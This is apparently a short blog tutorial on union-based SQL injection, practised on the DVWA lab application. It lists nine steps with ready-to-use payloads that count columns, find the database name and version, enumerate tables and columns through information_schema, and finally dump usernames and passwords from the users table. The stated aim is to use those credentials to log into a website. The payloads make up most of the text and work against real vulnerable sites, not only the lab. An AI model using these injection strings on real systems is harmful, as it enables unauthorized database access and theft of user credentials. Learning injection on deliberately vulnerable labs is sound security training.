Top Ad unit 728 × 90


Union Based  Injection : Union based injection is an advance attack which targets the website's database unlike the front. Hand like bypass authentication method which we covered last time.
The idea is to fetch the username and password of the website from admin,user or this kind of table from the database and use these credentials to login in the website.

We can do whole process on DVWA

Steps Of  Union Base Injection

Step 1: Find any GET Method in the Website.
GET : .php?id=10        POST : .php
Step 2: Check exception handling in the website.
Step 3: Check total number of columns in the respective table.' order by 1 --+Submit=Submit#
Step 4: Select a vulnerable column from the table.' union all select 1,2--+ &Submit=Submit#
Step 5: Check the database name' union all select database(),2--+ &Submit=Submit#
Step 6: Check the Version of the database.' union all select version(),2--+ &Submit=Submit#
Step 7: Check the total number of tables in the database' union all select 1,table_name from information_schema.tables --+ &Submit=Submit#
Target Table : users

Step 8 : Get the columns of the tabel users' union all select 1,column_name from information_schema.columns--+ &Submit=Submit#
where table_name='users'--+ &Submit=Submit#

Target Columns : user and password

Step 9 : Get the content of the user and password' union all select user,password from users--+

Post a Comment